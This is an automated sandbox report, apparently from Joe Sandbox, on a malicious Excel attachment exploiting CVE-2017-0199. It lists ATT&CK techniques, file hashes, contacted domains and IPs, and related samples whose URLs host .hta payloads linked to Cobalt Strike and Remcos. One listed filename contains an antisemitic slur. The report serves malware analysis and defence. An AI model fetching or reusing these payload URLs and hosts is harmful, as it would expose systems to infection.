Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Or_E7amento_US77.xla.xlsx21%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
Or_E7amento_US77.xla.xlsx24%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://sorkale.me/GsWz6D0%Avira URL Cloudsafe
https://al4.dev/Lj3tCg0%Avira URL Cloudsafe
https://sorkale.me/GsWz6Dj0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sorkale.me
104.21.87.137
truefalse
    unknown
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      high
      s-part-0017.t-0009.fb-t-msedge.net
      13.107.253.45
      truefalse
        high
        s-0005.dual-s-msedge.net
        52.123.129.14
        truefalse
          high
          al4.dev
          188.114.97.3
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://sorkale.me/GsWz6Dfalse
            • Avira URL Cloud: safe
            unknown
            https://al4.dev/Lj3tCgfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://sorkale.me/GsWz6DjOr_E7amento_US77.xla.xlsxfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            188.114.97.3
            al4.devEuropean Union
            13335CLOUDFLARENETUSfalse
            198.46.177.136
            unknownUnited States
            36352AS-COLOCROSSINGUSfalse
            104.21.87.137
            sorkale.meUnited States
            13335CLOUDFLARENETUSfalse
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1619095
            Start date and time:2025-02-19 15:30:27 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 0s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:12
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Or_E7amento_US77.xla.xlsx
            Detection:MAL
            Classification:mal60.expl.winXLSX@6/4@2/3
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .xlsx
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, MavInject32.exe
            • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.28.47, 199.232.210.172, 40.79.141.153, 51.116.253.170, 52.123.129.14, 20.190.159.75, 4.245.163.56, 13.107.253.45
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, onedscolprdgwc07.germanywestcentral.cloudapp.azure.com, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, onedscolprdfrc00.francecentral.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, uks-azsc-config.officeapps.liv
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            09:32:28API Interceptor944x Sleep call for process: splwow64.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            188.114.97.3http://violate.insta-assistcenter.eu/Get hashmaliciousUnknownBrowse
            • violate.insta-assistcenter.eu/assets/ve-62b851e2.svg
            http://case-id-1000292829264908.mashstaffing.com/Get hashmaliciousUnknownBrowse
            • case-id-1000292829264908.mashstaffing.com/banner-b1482d4c.webp
            QUOTATION REQUEST.exeGet hashmaliciousFormBookBrowse
            • www.timeinsardinia.info/fxnj/
            Drawing.bat.exeGet hashmaliciousFormBookBrowse
            • www.trosky.lol/6you/
            PO.exeGet hashmaliciousFormBookBrowse
            • www.kdjsswzx.club/9nn7/
            http://ilocation.live/ztBGet hashmaliciousUnknownBrowse
            • ilocation.live/ztB
            http://case-id-1000292829236938.mashstaffing.com/Get hashmaliciousUnknownBrowse
            • case-id-1000292829236938.mashstaffing.com/banner-b1482d4c.webp
            Ordine di acquisto_(PO102429)_OFT_PUMPS.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
            • ddrtot.shop/New/PWS/fre.php
            PO# 81136575.exeGet hashmaliciousFormBookBrowse
            • www.sbualdwhryi.info/3kya/
            SHIPMENT OF THE ORIGINAL DOCUMENTS.exeGet hashmaliciousFormBookBrowse
            • www.kdjsswzx.club/65bl/
            198.46.177.136Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136/xampp/konno/ko/sweetbabygirllovedmeperfectlygivemebestloverever.hta
            sweetbabygirllovedmeperfectlygivemebestloverever.htaGet hashmaliciousCobalt StrikeBrowse
            • 198.46.177.136/xampp/konno/sweetbabygirllovedmeperfectlyfromheart.gIF
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136/xampp/konno/ko/sweetbabygirllovedmeperfectlygivemebestloverever.hta
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136/xampp/konno/ko/sweetbabygirllovedmeperfectlygivemebestloverever.hta
            Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136/xampp/ksk/ks/mygirlnicegirlfriendcamewithbeautiufleyesgffo.hta
            Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136/xampp/ksk/ks/mygirlnicegirlfriendcamewithbeautiufleyesgffo.hta
            Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136/xampp/ksk/ks/mygirlnicegirlfriendcamewithbeautiufleyesgffo.hta
            nicekissonemylipswihtbettergreaturessmooththingstogoback.htaGet hashmaliciousCobalt Strike, RemcosBrowse
            • 198.46.177.136/xampp/kno/nicekissonemylipswihtbettergreaturessmooththingstogoback.txt
            Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136/xampp/kno/nko/nicekissonemylipswihtbettergreaturessmooththingstogoback.hta
            Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136/xampp/kno/nko/nicekissonemylipswihtbettergreaturessmooththingstogoback.hta
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            s-0005.dual-s-msedge.netOverdue Invoice.msgGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Request For Quotation-Asia Serv PO3848.xlsxGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Request For Quotation-Asia Serv PO3848.xlsxGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Axens_Jechan.lee.docxGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Quote US7756424AA.xla.xlsxGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Quote US7756424AA.xla.xlsxGet hashmaliciousUnknownBrowse
            • 52.123.129.14
            Order 5500ZZAA5546.xla.xlsxGet hashmaliciousUnknownBrowse
            • 52.123.129.14
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Order 5500ZZAA5546.xla.xlsxGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 52.123.128.14
            bg.microsoft.map.fastly.netFA (2).batGet hashmaliciousUnknownBrowse
            • 199.232.214.172
            DOC0003791175SVD09164420250219PDF(56KB).COM.exeGet hashmaliciousQuasarBrowse
            • 199.232.210.172
            SAFEQ Cloud - Secure Print.msiGet hashmaliciousUnknownBrowse
            • 199.232.214.172
            DHl-Global-Documents.jsGet hashmaliciousMassLogger RATBrowse
            • 199.232.214.172
            PEDIDO 110225-00026_2B63E944DF1243DC82A8AD84AAB0A6DC.PDF(91KB).COM.exeGet hashmaliciousQuasarBrowse
            • 199.232.210.172
            Quote US7756424AA.xla.xlsxGet hashmaliciousUnknownBrowse
            • 199.232.210.172
            1111.txt.ps1Get hashmaliciousUnknownBrowse
            • 199.232.214.172
            77954-668716095406000-20240826160944.pdf.jsGet hashmaliciousRemcosBrowse
            • 199.232.214.172
            file.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
            • 199.232.210.172
            Order 5500ZZAA5546.xla.xlsxGet hashmaliciousUnknownBrowse
            • 199.232.210.172
            s-part-0017.t-0009.fb-t-msedge.netCpssph Pending Docu Review Complete via-Sign Tuesday February 2025.msgGet hashmaliciousUnknownBrowse
            • 13.107.253.45
            bN0w6w2zmn.exeGet hashmaliciousUnknownBrowse
            • 13.107.253.45
            Quote US7756424AA.xla.xlsxGet hashmaliciousUnknownBrowse
            • 13.107.253.45
            Quote US7756424AA.xla.xlsxGet hashmaliciousUnknownBrowse
            • 13.107.253.45
            Order 5500ZZAA5546.xla.xlsxGet hashmaliciousUnknownBrowse
            • 13.107.253.45
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 13.107.253.45
            https://cinematicbakers-editoring-4cf.notion.site/Baker-Construction-Services-Shared-Document-19e659013a49808f8f46e4274245e60fGet hashmaliciousHTMLPhisherBrowse
            • 13.107.253.45
            https://inf-human.com/cf/verify/7362731/checkGet hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
            • 13.107.253.45
            https://neals-cool-site-53a71a.webflow.io/Get hashmaliciousHTMLPhisherBrowse
            • 13.107.253.45
            https://sourdline92700-my.sharepoint.com/:o:/g/personal/candy_p_sourdline_com/EuLbumqXqKlNrdO_dC4ToNQBjU8u8ArI7nekyzRD4pwAqQ?e=zVkpV4Get hashmaliciousUnknownBrowse
            • 13.107.253.45
            sorkale.meInvoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 172.67.143.130
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 104.21.87.137
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 172.67.143.130
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUSrSlutelementer.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 104.21.80.1
            Bank Transfer Form.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 104.21.80.1
            https://morlune.com/Get hashmaliciousUnknownBrowse
            • 104.21.33.223
            QUOTATION_JANQUOTE312025#U00faPDF.scrGet hashmaliciousUnknownBrowse
            • 104.21.48.1
            b5.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            b6.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            b3.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            b2.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            b1.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            https://malvinasrock.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%202/Get hashmaliciousHTMLPhisherBrowse
            • 104.21.27.125
            AS-COLOCROSSINGUSQUOTATION#00547-#U00c7EVRE TEKNO PROJECT.exeGet hashmaliciousAveMaria, DBatLoaderBrowse
            • 198.46.177.153
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136
            sweetbabygirllovedmeperfectlygivemebestloverever.htaGet hashmaliciousCobalt StrikeBrowse
            • 198.46.177.136
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 198.46.177.136
            NlHybrid.exeGet hashmaliciousTitanium Proxy, PureLog Stealer, XWormBrowse
            • 198.12.127.183
            seemebestthingstogivebestgetbackfirthem.htaGet hashmaliciousCobalt Strike, RemcosBrowse
            • 198.12.123.6
            kissingdragonbestloverthinkinggood.gz.vbsGet hashmaliciousRemcosBrowse
            • 198.12.123.6
            fuckjewishpeople.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 107.174.25.148
            SIP_2025270134098467531245434.exeGet hashmaliciousRemcosBrowse
            • 192.210.150.24
            CLOUDFLARENETUSrSlutelementer.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 104.21.80.1
            Bank Transfer Form.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 104.21.80.1
            https://morlune.com/Get hashmaliciousUnknownBrowse
            • 104.21.33.223
            QUOTATION_JANQUOTE312025#U00faPDF.scrGet hashmaliciousUnknownBrowse
            • 104.21.48.1
            b5.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            b6.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            b3.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            b2.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            b1.elfGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            https://malvinasrock.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%202/Get hashmaliciousHTMLPhisherBrowse
            • 104.21.27.125
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            6271f898ce5be7dd52b0fc260d0662b3Quote US7756424AA.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            Order 5500ZZAA5546.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            Order 5500ZZAA5546.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            Invoice.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            2024-03-12 22.15.37.jpgGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            Hic2gVOSh1.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            consulta.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 104.21.87.137
            No context
            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):118
            Entropy (8bit):3.5700810731231707
            Encrypted:false
            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
            MD5:573220372DA4ED487441611079B623CD
            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
            Malicious:false
            Reputation:high, very likely benign file
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):836
            Entropy (8bit):2.7151910322565733
            Encrypted:false
            SSDEEP:24:J3fIxk+vpKAk6ScvoGA8xpiOnAvJ5yoIHWK:h3+RfkpcvoGAYcvJ5LIHD
            MD5:92A7E6E963E0E668F6585E8694F68380
            SHA1:9CFB8F0EA9A80C54FEBF664E2E8DA3A20C6F5DAE
            SHA-256:F09EE04026948847263A11CC3D3276A676246EF074A985681DBEF03D76801482
            SHA-512:F3E94DC16458B4CE76A18D44360256A233CDF918A34FDB0AB3A85AF5FA3ADEB8B0BBB173CE658D8344939FE77AEB467C04D111A887424A65BA2833897DE3F4E2
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.
            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Reputation:high, very likely benign file
            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):165
            Entropy (8bit):1.4377382811115937
            Encrypted:false
            SSDEEP:3:KVC+cAmltV:KVC+cR
            MD5:9C7132B2A8CABF27097749F4D8447635
            SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
            SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
            SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
            Malicious:true
            Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Feb 19 08:39:54 2025, Security: 1
            Entropy (8bit):7.782727459772507
            TrID:
            • Microsoft Excel sheet (30009/1) 47.99%
            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
            File name:Or_E7amento_US77.xla.xlsx
            File size:1'209'856 bytes
            MD5:d5e3d15713c6dc5089c44adea05e9d7c
            SHA1:e60f17826909afb706efa612d176cfb82c8cca47
            SHA256:ccdc8bb028dfd5bdc418ce46e263bccf983efe6df83a239974af973059561902
            SHA512:6e5b24f212081ff1a625d271076da7d70c4e55be388dad2075d8e076398df7ae78bf9dd2b35b7e89c20917e4369bd9d8ef6f9fc17ff23048695eaf7f347507c8
            SSDEEP:24576:8YVGHlc5BoblqVAbCWG3ULbcGmmf08+eF2ABFZYdXbdzd:TVGH65qblCEPQULNdnJUL
            TLSH:F3450213EA768E2ACD8953B10BC24B621774DE009173460F1BB0777865FFEA979861EC
            File Content Preview:........................>..............................................................................................._...`...a...b...c...d...|..............................................................................................................
            Icon Hash:35e58a8c0c8a85b9
            Document Type:OLE
            Number of OLE Files:1
            Has Summary Info:
            Application Name:Microsoft Excel
            Encrypted Document:True
            Contains Word Document Stream:False
            Contains Workbook/Book Stream:True
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:True
            Code Page:1252
            Author:
            Last Saved By:
            Create Time:2006-09-16 00:00:00
            Last Saved Time:2025-02-19 08:39:54
            Creating Application:Microsoft Excel
            Security:1
            Document Code Page:1252
            Thumbnail Scaling Desired:False
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:786432
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
            VBA File Name:Sheet1.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5a fe d2 c2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Attribute VB_Name = "Sheet1"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
            VBA File Name:Sheet2.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5a fe fc af 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Attribute VB_Name = "Sheet2"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
            VBA File Name:Sheet3.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z ; . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5a fe d2 3b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Attribute VB_Name = "Sheet3"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
            VBA File Name:ThisWorkbook.cls
            Stream Size:985
